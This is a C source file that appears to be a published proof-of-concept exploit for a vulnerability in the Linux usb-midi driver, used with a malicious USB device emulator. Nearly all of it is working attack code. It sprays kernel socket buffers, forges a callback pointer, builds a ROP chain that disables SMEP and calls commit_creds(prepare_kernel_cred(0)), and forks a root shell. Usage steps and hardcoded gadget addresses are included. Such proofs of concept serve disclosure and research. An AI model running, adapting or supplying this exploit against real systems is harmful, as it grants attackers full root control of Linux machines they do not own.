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// A part of the proof-of-concept exploit for the vulnerability in the usb-midi
// driver. Meant to be used in conjuction with a hardware usb emulator, which
// emulates a particular malicious usb device (a Facedancer21 for example).
//
// Andrey Konovalov <andreyknvl@gmail.com>
//
// Usage:
// // Edit source to set addresses of the kernel symbols and the ROP gadgets.
// $ gcc poc.c -masm=intel
// // Run N instances of the binary with the argument increasing from 0 to N,
// // where N is the number of cpus on your machine.
// $ ./a.out 0 & ./a.out 1 & ...
// [+] starting as: uid=1000, euid=1000
// [+] payload addr: 0x400b60
// [+] fake stack mmaped
// [+] plug in the usb device...
// // Now plug in the device a few times.
// // In one of the instances you will get (if the kernel doesn't crash):
// [+] got r00t: uid=0, euid=0
// # id
// uid=0(root) gid=0(root) groups=0(root)
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
// You need to set these based on your kernel.
// To easiest way to obtain the addresses of commit_creds and prepare_kernel_cred
// is to boot your kernel and grep /proc/kallsyms for them.
// The easiest way to obtain the gadgets addresses is to use the ROPgadget util.
// Note that all of the used gadgets must preserve the initial value of the rbp
// register, since this value is used later on to restore rsp.
// The value of CR4_DESIRED_VALUE must have the SMEP bit disabled.
#define COMMIT_CREDS 0xffffffff810957e0L
#define PREPARE_KERNEL_CRED 0xffffffff81095ae0L
#define XCHG_EAX_ESP_RET 0xffffffff8100008aL
#define POP_RDI_RET 0xffffffff8118991dL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17L
#define MOV_CR4_RDI_RET 0xffffffff8105b8f0L
#define POP_RCX_RET 0xffffffff810053bcL
#define JMP_RCX 0xffffffff81040a90L
#define CR4_DESIRED_VALUE 0x407f0
// Payload. Saves eax, which holds the 32 lower bits of the old esp value,
// disables SMEP, restores rsp, obtains root, jumps back to the caller.
#define CHAIN_SAVE_EAX \
*stack++ = POP_RDI_RET; \
*stack++ = (uint64_t)&saved_eax; \
*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
#define CHAIN_SET_CR4 \
*stack++ = POP_RDI_RET; \
*stack++ = CR4_DESIRED_VALUE; \
*stack++ = MOV_CR4_RDI_RET; \
#define CHAIN_JMP_PAYLOAD \
*stack++ = POP_RCX_RET; \
*stack++ = (uint64_t)&payload; \
*stack++ = JMP_RCX; \
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
void get_root(void) {
commit_creds(prepare_kernel_cred(0));
}
uint64_t saved_eax;
// Unfortunately GCC does not support `__atribute__((naked))` on x86, which
// can be used to omit a function's prologue, so I had to use this weird
// wrapper hack as a workaround. Note: Clang does support it, which means it
// has better support of GCC attributes than GCC itself. Funny.
void wrapper() {
asm volatile (" \n\
payload: \n\
movq %%rbp, %%rax \n\
movq $0xffffffff00000000, %%rdx \n\
andq %%rdx, %%rax \n\
movq %0, %%rdx \n\
addq %%rdx, %%rax \n\
movq %%rax, %%rsp \n\
jmp get_root \n\
" : : "m"(saved_eax) : );
}
void payload();
// Kernel structs.
struct ubuf_info {
uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
uint64_t ctx; // void *
uint64_t desc; // unsigned long
};
struct skb_shared_info {
uint8_t nr_frags; // unsigned char
uint8_t tx_flags; // __u8
uint16_t gso_size; // unsigned short
uint16_t gso_segs; // unsigned short
uint16_t gso_type; // unsigned short
uint64_t frag_list; // struct sk_buff *
uint64_t hwtstamps; // struct skb_shared_hwtstamps
uint32_t tskey; // u32
uint32_t ip6_frag_id; // __be32
uint32_t dataref; // atomic_t
uint64_t destructor_arg; // void *
uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
};
#define MIDI_MAX_ENDPOINTS 2
struct snd_usb_midi {
uint8_t bullshit[240];
struct snd_usb_midi_endpoint {
uint64_t out; // struct snd_usb_midi_out_endpoint *
uint64_t in; // struct snd_usb_midi_in_endpoint *
} endpoints[MIDI_MAX_ENDPOINTS];
// More bullshit.
};
// Init buffer for overwriting a skbuff object.
struct ubuf_info ui;
void init_buffer(char* buffer) {
struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[192];
struct snd_usb_midi *midi = (struct snd_usb_midi *)&buffer[0];
int i;
ssi->tx_flags = 0xff;
ssi->destructor_arg = (uint64_t)&ui;
ui.callback = XCHG_EAX_ESP_RET;
// Prevents some crashes.
ssi->nr_frags = 0;
// Prevents some crashes.
ssi->frag_list = 0;
// Prevents some crashes.
for (i = 0; i < MIDI_MAX_ENDPOINTS; i++) {
midi->endpoints[i].out = 0;
midi->endpoints[i].in = 0;
}
}
// Map a fake stack where the ROP payload resides.
void mmap_stack() {
uint64_t stack_addr;
int stack_offset;
uint64_t* stack;
int page_size;
page_size = getpagesize();
stack_addr = (XCHG_EAX_ESP_RET & 0x00000000ffffffffL) & ~(page_size - 1);
stack_offset = XCHG_EAX_ESP_RET % page_size;
stack = mmap((void *)stack_addr, page_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (stack == MAP_FAILED) {
perror("[-] mmap()");
exit(EXIT_FAILURE);
}
stack = (uint64_t *)((char *)stack + stack_offset);
CHAIN_SAVE_EAX;
CHAIN_SET_CR4;
CHAIN_JMP_PAYLOAD;
}
// Sending control messages.
int socket_open(int port) {
int sock;
struct sockaddr_in sa;
sock = socket(AF_INET, SOCK_DGRAM, 0);
if (sock == -1) {
perror("[-] socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("[-] connect()");
exit(EXIT_FAILURE);
}
return sock;
}
void socket_close(int sock) {
close(sock);
}
void socket_sendmmsg(int sock) {
struct mmsghdr msg[1];
struct iovec msg2;
int rv;
char buffer[512];
memset(&msg2, 0, sizeof(msg2));
msg2.iov_base = &buffer[0];
msg2.iov_len = 512;
memset(msg, 0, sizeof(msg));
msg[0].msg_hdr.msg_iov = &msg2;
msg[0].msg_hdr.msg_iovlen = 1;
memset(&buffer[0], 0xa1, 512);
struct cmsghdr *hdr = (struct cmsghdr *)&buffer[0];
hdr->cmsg_len = 512;
hdr->cmsg_level = SOL_IP + 1;
init_buffer(&buffer[0]);
msg[0].msg_hdr.msg_control = &buffer[0];
msg[0].msg_hdr.msg_controllen = 512;
rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
if (rv == -1) {
perror("[-] sendmmsg()");
exit(EXIT_FAILURE);
}
}
// Allocating and freeing skbuffs.
struct sockaddr_in server_si_self;
struct sockaddr_in client_si_other;
int init_server(int port) {
int sock;
int rv;
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sock == -1) {
perror("[-] socket()");
exit(EXIT_FAILURE);
}
memset(&server_si_self, 0, sizeof(server_si_self));
server_si_self.sin_family = AF_INET;
server_si_self.sin_port = htons(port);
server_si_self.sin_addr.s_addr = htonl(INADDR_ANY);
rv = bind(sock, (struct sockaddr *)&server_si_self,
sizeof(server_si_self));
if (rv == -1) {
perror("[-] bind()");
exit(EXIT_FAILURE);
}
return sock;
}
int init_client(int port) {
int sock;
int rv;
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sock == -1) {
perror("[-] socket()");
exit(EXIT_FAILURE);
}
memset(&client_si_other, 0, sizeof(client_si_other));
client_si_other.sin_family = AF_INET;
client_si_other.sin_port = htons(port);
rv = inet_aton("127.0.0.1", &client_si_other.sin_addr);
if (rv == 0) {
perror("[-] inet_aton()");
exit(EXIT_FAILURE);
}
return sock;
}
void client_send_message(int sock) {
int rv;
// Messages of 128 bytes result in 512 bytes skbuffs.
char sent_message[128] = { 0x10 };
rv = sendto(sock, &sent_message[0], 128, 0,
(struct sockaddr *)&client_si_other,
sizeof(client_si_other));
if (rv == -1) {
perror("[-] sendto()");
exit(EXIT_FAILURE);
}
}
void destroy_server(int sock) {
close(sock);
}
void destroy_client(int sock) {
close(sock);
}
// Checking root.
void exec_shell() {
char *args[] = {"/bin/sh", "-i", NULL};
execve("/bin/sh", args, NULL);
}
void fork_shell() {
pid_t rv;
rv = fork();
if (rv == -1) {
perror("[-] fork()");
exit(EXIT_FAILURE);
}
if (rv == 0) {
exec_shell();
}
while (true) {
sleep(1);
}
}
bool is_root() {
return getuid() == 0;
}
void check_root() {
if (!is_root())
return;
printf("[+] got r00t: uid=%d, euid=%d\n", getuid(), geteuid());
// Fork and exec instead of just doing the exec to avoid freeing skbuffs
// and prevent some crashes due to a allocator corruption.
fork_shell();
}
// Main.
#define PORT_BASE_1 4100
#define PORT_BASE_2 4200
#define PORT_BASE_3 4300
#define SKBUFFS_NUM 64
#define MMSGS_NUM 256
int server_sock;
int client_sock;
void step_begin(int id) {
int i;
server_sock = init_server(PORT_BASE_2 + id);
client_sock = init_client(PORT_BASE_2 + id);
for (i = 0; i < SKBUFFS_NUM; i++) {
client_send_message(client_sock);
}
for (i = 0; i < MMSGS_NUM; i++) {
int sock = socket_open(PORT_BASE_3 + id);
socket_sendmmsg(sock);
socket_close(sock);
}
}
void step_end(int id) {
destroy_server(server_sock);
destroy_client(client_sock);
}
void body(int id) {
int server_sock, client_sock, i;
server_sock = init_server(PORT_BASE_1 + id);
client_sock = init_client(PORT_BASE_1 + id);
for (i = 0; i < 512; i++)
client_send_message(client_sock);
while (true) {
step_begin(id);
check_root();
step_end(id);
}
}
bool parse_int(const char *input, int *output) {
char* wrong_token = NULL;
int result = strtol(input, &wrong_token, 10);
if (*wrong_token != '\0') {
return false;
}
*output = result;
return true;
}
int main(int argc, char **argv) {
bool rv;
int id;
if (argc != 2) {
printf("Usage: %s <instance_id>\n", argv[0]);
return EXIT_SUCCESS;
}
rv = parse_int(argv[1], &id);
if (!rv) {
printf("Usage: %s <instance_id>\n", argv[0]);
return EXIT_SUCCESS;
}
printf("[+] starting as: uid=%d, euid=%d\n", getuid(), geteuid());
printf("[+] payload addr: %p\n", &payload);
mmap_stack();
printf("[+] fake stack mmaped\n");
printf("[+] plug in the usb device...\n");
body(id);
return EXIT_SUCCESS;
}